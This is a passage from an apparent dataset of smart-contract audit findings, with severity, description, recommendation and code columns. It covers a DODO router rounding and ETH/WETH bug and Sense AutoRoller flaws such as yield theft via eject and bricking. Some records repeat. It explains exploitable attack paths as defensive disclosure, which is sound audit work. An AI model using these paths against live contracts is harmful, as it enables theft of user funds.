at the same time so they would use a secondary account to alternate and always keep an active proposal.","There should be a function to emergency eject the token from staking. To prevent abuse a token that has been emergency ejected should be blacklisted from staking again for a certain cooldown period, such as the length of current voting period.",Delegatees can never unstake or delegate to anyone else,"```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n" +Rounding error when call function `dodoMultiswap()` can lead to revert of transaction or fund of user,medium,"The calculation of the proportion when do the split swap in function `_multiSwap` doesn't care about the rounding error\\nThe amount of `midToken` will be transfered to the each adapter can be calculated by formula `curAmount = curTotalAmount * weight / totalWeight`\\n```\\nif (assetFrom[i - 1] == address(this)) {\\n uint256 curAmount = curTotalAmount * curPoolInfo.weight / curTotalWeight;\\n\\n\\n if (curPoolInfo.poolEdition == 1) {\\n //For using transferFrom pool (like dodoV1, Curve), pool call transferFrom function to get tokens from adapter\\n IERC20(midToken[i]).transfer(curPoolInfo.adapter, curAmount);\\n } else {\\n //For using transfer pool (like dodoV2), pool determine swapAmount through balanceOf(Token) - reserve\\n IERC20(midToken[i]).transfer(curPoolInfo.pool, curAmount);\\n }\\n}\\n```\\n\\nIt will lead to some scenarios when `curTotalAmount * curPoolInfo.weight` is not divisible by `curTotalWeight`, there will be some token left after the swap.\\nFor some tx, if user set a `minReturnAmount` strictly, it may incur the reversion. For some token with small decimal and high value, it can make a big loss for the sender.","Add a accumulation variable to maintain the total amount is transfered after each split swap. In the last split swap, instead of calculating the `curAmount` by formula above, just take the remaining amount to swap.",Revert the transaction because not enough amount of `toToken`\\nSender can lose a small amount of tokens,"```\\nif (assetFrom[i - 1] == address(this)) {\\n uint256 curAmount = curTotalAmount * curPoolInfo.weight / curTotalWeight;\\n\\n\\n if (curPoolInfo.poolEdition == 1) {\\n //For using transferFrom pool (like dodoV1, Curve), pool call transferFrom function to get tokens from adapter\\n IERC20(midToken[i]).transfer(curPoolInfo.adapter, curAmount);\\n } else {\\n //For using transfer pool (like dodoV2), pool determine swapAmount through balanceOf(Token) - reserve\\n IERC20(midToken[i]).transfer(curPoolInfo.pool, curAmount);\\n }\\n}\\n```\\n" +Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwap,medium,"Lack of logic to wrap the native ETH to WETH in function externalSwap\\nThe function exeternalSwap can handle external swaps with 0x, 1inch and paraswap or other external resources.\\n```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], ""DODORouteProxy: Not Whitelist Contract""); \\n require(isApproveWhiteListedContract[approveTarget], ""DODORouteProxy: Not Whitelist Appprove Contract""); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nnote the code above, if the fromToken is set to _ETH_ADDRESS, indicating the user wants to trade with native ETH pair. the function does has payable modifier and user can send ETH along when calling this function.\\nHowever, the toTokenOriginBalance is check the only WETH balance instead of ETH balance.\\n```\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nThen we do the swap:\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nIf the fromToken is _ETH_ADDRESS, we send the user supplied fromTokenAmount without verifying that the fromTokenAmount.\\nFinally, we use the before and after balance to get the amount with received.\\n```\\n// calculate toToken amount\\n if(toToken != _ETH_ADDRESS_) {\\n receiveAmount = IERC20(toToken).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n } else {\\n receiveAmount = IERC20(_WETH_).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n }\\n```\\n\\nWe are checking the WETH amount instead of ETH amount again.\\nThe issue is that some trades may settle the trade in native ETH, for example\\nwe can look into the Paraswap contract\\nIf we click the implementation contract and see the method swapOnUniswapV2Fork\\nCode line 927 - 944, which calls the function\\n```\\nfunction swapOnUniswapV2Fork(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] calldata pools\\n)\\n external\\n payable\\n{\\n _swap(\\n tokenIn,\\n amountIn,\\n amountOutMin,\\n weth,\\n pools\\n );\\n}\\n```\\n\\nwhich calls:\\n```\\n function _swap(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] memory pools\\n )\\n private\\n returns (uint256 tokensBought)\\n {\\n uint256 pairs = pools.length;\\n\\n require(pairs != 0, ""At least one pool required"");\\n\\n bool tokensBoughtEth;\\n\\n if (tokenIn == ETH_IDENTIFIER) {\\n require(amountIn == msg.value, ""Incorrect msg.value"");\\n IWETH(weth).deposit{value: msg.value}();\\n require(IWETH(weth).transfer(address(pools[0]), msg.value));\\n } else {\\n require(msg.value == 0, ""Incorrect msg.value"");\\n transferTokens(tokenIn, msg.sender, address(pools[0]), amountIn);\\n tokensBoughtEth = weth != address(0);\\n }\\n\\n tokensBought = amountIn;\\n\\n for (uint256 i = 0; i < pairs; ++i) {\\n uint256 p = pools[i];\\n address pool = address(p);\\n bool direction = p & DIRECTION_FLAG == 0;\\n\\n tokensBought = NewUniswapV2Lib.getAmountOut(\\n tokensBought, pool, direction, p FEE_OFFSET\\n );\\n (uint256 amount0Out, uint256 amount1Out) = direction\\n ? (uint256(0), tokensBought) : (tokensBought, uint256(0));\\n IUniswapV2Pair(pool).swap(\\n amount0Out,\\n amount1Out,\\n i + 1 == pairs\\n ? (tokensBoughtEth ? address(this) : msg.sender)\\n : address(pools[i + 1]),\\n """"\\n );\\n }\\n\\n if (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n }\\n\\n require(tokensBought >= amountOutMin, ""UniswapV2Router: INSUFFICIENT_OUTPUT_AMOUNT"");\\n }\\n```\\n\\nas can clearly see, the code first receive ETH, wrap ETH to WETH, then instead end, unwrap the WETH to ETH and the send the ETH back to complete the trade.\\n```\\nif (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n}\\n```\\n\\nIn DODORouterProxy.sol#ExternalSwap however, we are using WETH balance before and after to check the received amount,\\nbut if we call swapOnUniswapV2Fork on Paraswap router, the balance change for WETH would be 0\\nbecause as we see above, the method on paraswap side wrap ETH to WETH but in the end unwrap WETH and send ETH back.\\nThere is also a lack of a method to wrap the ETH to WETH before the trade. making the ETH-related order not tradeable.","Issue Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwap\\nWe recommend the project change from\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_ETH_ADDRESS).universalBalanceOf(address(this));\\n }\\n```\\n\\nIf we want to use WETH to do the balance check, we can help the user wrap the ETH to WETH by calling before do the balance check.\\n```\\nIWETH(_WETH_).deposit(receiveAmount);\\n```\\n\\nIf we want to use WETH as the reference to trade, we also need to approve external contract to spend our WETH.\\nWe can add\\n```\\nif(fromToken == _ETH_ADDRESS) {\\n IERC20(_WETH_).universalApproveMax(approveTarget, fromTokenAmount);\\n}\\n```\\n\\nWe also need to verify the fromTokenAmount for\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nwe can add the check:\\n```\\nrequire(msg.value == fromTokenAmount, ""invalid ETH amount"");\\n```\\n",A lot of method that does not use WETH to settle the trade will not be callable.,"```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], ""DODORouteProxy: Not Whitelist Contract""); \\n require(isApproveWhiteListedContract[approveTarget], ""DODORouteProxy: Not Whitelist Appprove Contract""); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n" +Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwap,medium,"Lack of logic to wrap the native ETH to WETH in function externalSwap\\nThe function exeternalSwap can handle external swaps with 0x, 1inch and paraswap or other external resources.\\n```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], ""DODORouteProxy: Not Whitelist Contract""); \\n require(isApproveWhiteListedContract[approveTarget], ""DODORouteProxy: Not Whitelist Appprove Contract""); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nnote the code above, if the fromToken is set to _ETH_ADDRESS, indicating the user wants to trade with native ETH pair. the function does has payable modifier and user can send ETH along when calling this function.\\nHowever, the toTokenOriginBalance is check the only WETH balance instead of ETH balance.\\n```\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nThen we do the swap:\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nIf the fromToken is _ETH_ADDRESS, we send the user supplied fromTokenAmount without verifying that the fromTokenAmount.\\nFinally, we use the before and after balance to get the amount with received.\\n```\\n// calculate toToken amount\\n if(toToken != _ETH_ADDRESS_) {\\n receiveAmount = IERC20(toToken).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n } else {\\n receiveAmount = IERC20(_WETH_).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n }\\n```\\n\\nWe are checking the WETH amount instead of ETH amount again.\\nThe issue is that some trades may settle the trade in native ETH, for example\\nwe can look into the Paraswap contract\\nIf we click the implementation contract and see the method swapOnUniswapV2Fork\\nCode line 927 - 944, which calls the function\\n```\\nfunction swapOnUniswapV2Fork(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] calldata pools\\n)\\n external\\n payable\\n{\\n _swap(\\n tokenIn,\\n amountIn,\\n amountOutMin,\\n weth,\\n pools\\n );\\n}\\n```\\n\\nwhich calls:\\n```\\n function _swap(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] memory pools\\n )\\n private\\n returns (uint256 tokensBought)\\n {\\n uint256 pairs = pools.length;\\n\\n require(pairs != 0, ""At least one pool required"");\\n\\n bool tokensBoughtEth;\\n\\n if (tokenIn == ETH_IDENTIFIER) {\\n require(amountIn == msg.value, ""Incorrect msg.value"");\\n IWETH(weth).deposit{value: msg.value}();\\n require(IWETH(weth).transfer(address(pools[0]), msg.value));\\n } else {\\n require(msg.value == 0, ""Incorrect msg.value"");\\n transferTokens(tokenIn, msg.sender, address(pools[0]), amountIn);\\n tokensBoughtEth = weth != address(0);\\n }\\n\\n tokensBought = amountIn;\\n\\n for (uint256 i = 0; i < pairs; ++i) {\\n uint256 p = pools[i];\\n address pool = address(p);\\n bool direction = p & DIRECTION_FLAG == 0;\\n\\n tokensBought = NewUniswapV2Lib.getAmountOut(\\n tokensBought, pool, direction, p FEE_OFFSET\\n );\\n (uint256 amount0Out, uint256 amount1Out) = direction\\n ? (uint256(0), tokensBought) : (tokensBought, uint256(0));\\n IUniswapV2Pair(pool).swap(\\n amount0Out,\\n amount1Out,\\n i + 1 == pairs\\n ? (tokensBoughtEth ? address(this) : msg.sender)\\n : address(pools[i + 1]),\\n """"\\n );\\n }\\n\\n if (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n }\\n\\n require(tokensBought >= amountOutMin, ""UniswapV2Router: INSUFFICIENT_OUTPUT_AMOUNT"");\\n }\\n```\\n\\nas can clearly see, the code first receive ETH, wrap ETH to WETH, then instead end, unwrap the WETH to ETH and the send the ETH back to complete the trade.\\n```\\nif (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n}\\n```\\n\\nIn DODORouterProxy.sol#ExternalSwap however, we are using WETH balance before and after to check the received amount,\\nbut if we call swapOnUniswapV2Fork on Paraswap router, the balance change for WETH would be 0\\nbecause as we see above, the method on paraswap side wrap ETH to WETH but in the end unwrap WETH and send ETH back.\\nThere is also a lack of a method to wrap the ETH to WETH before the trade. making the ETH-related order not tradeable.","We recommend the project change from\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_ETH_ADDRESS).universalBalanceOf(address(this));\\n }\\n```\\n\\nIf we want to use WETH to do the balance check, we can help the user wrap the ETH to WETH by calling before do the balance check.\\n```\\nIWETH(_WETH_).deposit(receiveAmount);\\n```\\n\\nIf we want to use WETH as the reference to trade, we also need to approve external contract to spend our WETH.\\nWe can add\\n```\\nif(fromToken == _ETH_ADDRESS) {\\n IERC20(_WETH_).universalApproveMax(approveTarget, fromTokenAmount);\\n}\\n```\\n\\nWe also need to verify the fromTokenAmount for\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nwe can add the check:\\n```\\nrequire(msg.value == fromTokenAmount, ""invalid ETH amount"");\\n```\\n",A lot of method that does not use WETH to settle the trade will not be callable.,"```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], ""DODORouteProxy: Not Whitelist Contract""); \\n require(isApproveWhiteListedContract[approveTarget], ""DODORouteProxy: Not Whitelist Appprove Contract""); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n" +AutoRoller#eject can be used to steal all the yield from vault's YTs,high,"AutoRoller#eject collects all the current yield of the YTs, combines the users share of the PTs and YTs then sends the user the entire target balance of the contract. The problem is that combine claims the yield for ALL YTs, which sends the AutoRoller target assets. Since it sends the user the entire target balance of the contract it accidentally sends the user the yield from all the pool's YTs.\\n```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n\\nEject allows the user to leave the liquidity pool by withdrawing their liquidity from the Balancer pool and combining the PTs and YTs via divider.combine.\\n```\\nfunction combine(\\n address adapter,\\n uint256 maturity,\\n uint256 uBal\\n) external nonReentrant whenNotPaused returns (uint256 tBal) {\\n if (!adapterMeta[adapter].enabled) revert Errors.InvalidAdapter();\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n uint256 level = adapterMeta[adapter].level;\\n if (level.combineRestricted() && msg.sender != adapter) revert Errors.CombineRestricted();\\n\\n // Burn the PT\\n Token(series[adapter][maturity].pt).burn(msg.sender, uBal);\\n\\n //@audit call of interest\\n uint256 collected = _collect(msg.sender, adapter, maturity, uBal, uBal, address(0));\\n\\n // rest of code\\n\\n // Convert from units of Underlying to units of Target\\n tBal = uBal.fdiv(cscale);\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, msg.sender, tBal);\\n\\n // Notify only when Series is not settled as when it is, the _collect() call above would trigger a _redeemYT which will call notify\\n if (!settled) Adapter(adapter).notify(msg.sender, tBal, false);\\n unchecked {\\n // Safety: bounded by the Target's total token supply\\n tBal += collected;\\n }\\n emit Combined(adapter, maturity, tBal, msg.sender);\\n}\\n```\\n\\n```\\nfunction _collect(\\n address usr,\\n address adapter,\\n uint256 maturity,\\n uint256 uBal,\\n uint256 uBalTransfer,\\n address to\\n) internal returns (uint256 collected) {\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n if (!adapterMeta[adapter].enabled && !_settled(adapter, maturity)) revert Errors.InvalidAdapter();\\n\\n Series memory _series = series[adapter][maturity];\\n uint256 lscale = lscales[adapter][maturity][usr];\\n\\n // rest of code\\n\\n uint256 tBalNow = uBal.fdivUp(_series.maxscale); // preventive round-up towards the protocol\\n uint256 tBalPrev = uBal.fdiv(lscale);\\n unchecked {\\n collected = tBalPrev > tBalNow ? tBalPrev - tBalNow : 0;\\n }\\n\\n //@audit adapter.target is transferred to AutoRoller\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, usr, collected);\\n Adapter(adapter).notify(usr, collected, false); // Distribute reward tokens\\n\\n // rest of code\\n}\\n```\\n\\nInside divider#combine the collected yield from the YTs are transferred to the AutoRoller. The AutoRoller balance will now contain both the collected yield of the YTs and the target yielded by combining. The end of eject transfers this entire balance to the caller, effectively stealing the yield of the entire AutoRoller.",Combine returns the amount of target yielded by combining the PT and YT. This balance is the amount of assets that should be transferred to the user.,User funds given to the wrong person,"```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n" +Adversary can brick AutoRoller by creating another AutoRoller on the same adapter,high,"onSponsorWindowOpened attempts to make a new series at the desired maturity. Each adapter can only have one of each maturity. If the maturity requested already exists then onSponsorWindowOpened will revert, making it impossible to roll the AutoRoller. An adversary can take advantage of this to brick an AutoRoller by creating a second AutoRoller on the same adapter that will create a target maturity before the first AutoRoller. Since the maturity now exists, the first AutoRoller will always revert when trying to Roll.\\n```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n\\nInside AutoRoller#onSponsorWindowOpened the maturity is calculated using RollerUtils#getFutureMaturity. This returns the timestamp the requested months ahead, truncated down to the first of the month. It passes this calculated maturity as the maturity to sponsor a new series.\\n```\\n(ERC20 _pt, YTLike _yt) = periphery.sponsorSeries(address(adapter), _maturity, true);\\n```\\n\\n```\\nfunction sponsorSeries(\\n address adapter,\\n uint256 maturity,\\n bool withPool\\n) external returns (address pt, address yt) {\\n (, address stake, uint256 stakeSize) = Adapter(adapter).getStakeAndTarget();\\n\\n // Transfer stakeSize from sponsor into this contract\\n ERC20(stake).safeTransferFrom(msg.sender, address(this), stakeSize);\\n\\n // Approve divider to withdraw stake assets\\n ERC20(stake).approve(address(divider), stakeSize);\\n\\n (pt, yt) = divider.initSeries(adapter, maturity, msg.sender);\\n\\n // Space pool is always created for verified adapters whilst is optional for unverified ones.\\n // Automatically queueing series is only for verified adapters\\n if (verified[adapter]) {\\n poolManager.queueSeries(adapter, maturity, spaceFactory.create(adapter, maturity));\\n } else {\\n if (withPool) {\\n spaceFactory.create(adapter, maturity);\\n }\\n }\\n emit SeriesSponsored(adapter, maturity, msg.sender);\\n}\\n```\\n\\nperiphery#sponsorSeries is called with true indicating to create a space pool for the newly created series.\\n```\\nfunction create(address adapter, uint256 maturity) external returns (address pool) {\\n address pt = divider.pt(adapter, maturity);\\n _require(pt != address(0), Errors.INVALID_SERIES);\\n _require(pools[adapter][maturity] == address(0), Errors.POOL_ALREADY_EXISTS);\\n\\n pool = address(new Space(\\n vault,\\n adapter,\\n maturity,\\n pt,\\n ts,\\n g1,\\n g2,\\n oracleEnabled\\n ));\\n\\n pools[adapter][maturity] = pool;\\n}\\n```\\n\\nWe run into an issue inside SpaceFactory#create because it only allows a single pool per adapter/maturity. If a pool already exist then it will revert.\\nAn adversary can abuse this revert to brick an existing AutoRoller. Assume AutoRoller A has a duration of 3 months. Its current maturity is December 1st 2022, when rolled it will attempt to create a series at March 1st 2023. An adversary could abuse this and create AutoRoller B with a maturity of 4 months. When they roll for the first time it will create a series with maturity at March 1st 2023. When AutoRoller A attempts to roll it will revert since a series already exists at March 1st 2023.\\nThis conflict can happen accidentally if there is a monthly AutoRoller and a quarterly AutoRoller. It also hinders the viability of using an AutoRoller for an adapter that is popular because the series will likely have been created by the time the autoroller tries to roll into it.",Requiring that the AutoRoller has to create the series seems overly restrictive and leads to a large number of issues. Attempting to join an a series that is already initialized could also lead to pool manipulation rates. It seems like a large refactoring is needed for the rolling section of the AutoRoller,AutoRollers will frequently be bricked,"```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n" +Hardcoded divider address in RollerUtils is incorrect and will brick autoroller,medium,"RollerUtils uses a hard-coded constant for the Divider. This address is incorrect and will cause a revert when trying to call AutoRoller#cooldown. If the adapter is combineRestricted then LPs could potentially be unable to withdraw or eject.\\n```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n\\nRollerUtils uses a hardcoded constant DIVIDER to store the Divider address. There are two issues with this. The most pertinent issue is that the current address used is not the correct mainnet address. The second is that if the divider is upgraded, changing the address of the RollerUtils may be forgotten.\\n```\\n (, uint48 prevIssuance, , , , , uint256 iscale, uint256 mscale, ) = DividerLike(DIVIDER).series(adapter, prevMaturity);\\n```\\n\\nWith an incorrect address the divider#series call will revert causing RollerUtils#getNewTargetedRate to revert, which is called in AutoRoller#cooldown. The result is that the AutoRoller cycle can never be completed. LP will be forced to either withdraw or eject to remove their liquidity. Withdraw only works to a certain point because the AutoRoller tries to keep the target ratio. After which the eject would be the only way for LPs to withdraw. During eject the AutoRoller attempts to combine the PT and YT. If the adapter is also combineRestricted then there is no longer any way for the LPs to withdraw, causing loss of their funds.",RollerUtils DIVIDER should be set by constructor. Additionally RollerUtils should be deployed by the factory constructor to make sure they always have the same immutable divider reference.,Incorrect hard-coded divider address will brick autorollers for all adapters and will cause loss of funds for combineRestricted adapters,```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n +AutoRoller#eject can be used to steal all the yield from vault's YTs,high,"AutoRoller#eject collects all the current yield of the YTs, combines the users share of the PTs and YTs then sends the user the entire target balance of the contract. The problem is that combine claims the yield for ALL YTs, which sends the AutoRoller target assets. Since it sends the user the entire target balance of the contract it accidentally sends the user the yield from all the pool's YTs.\\n```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n 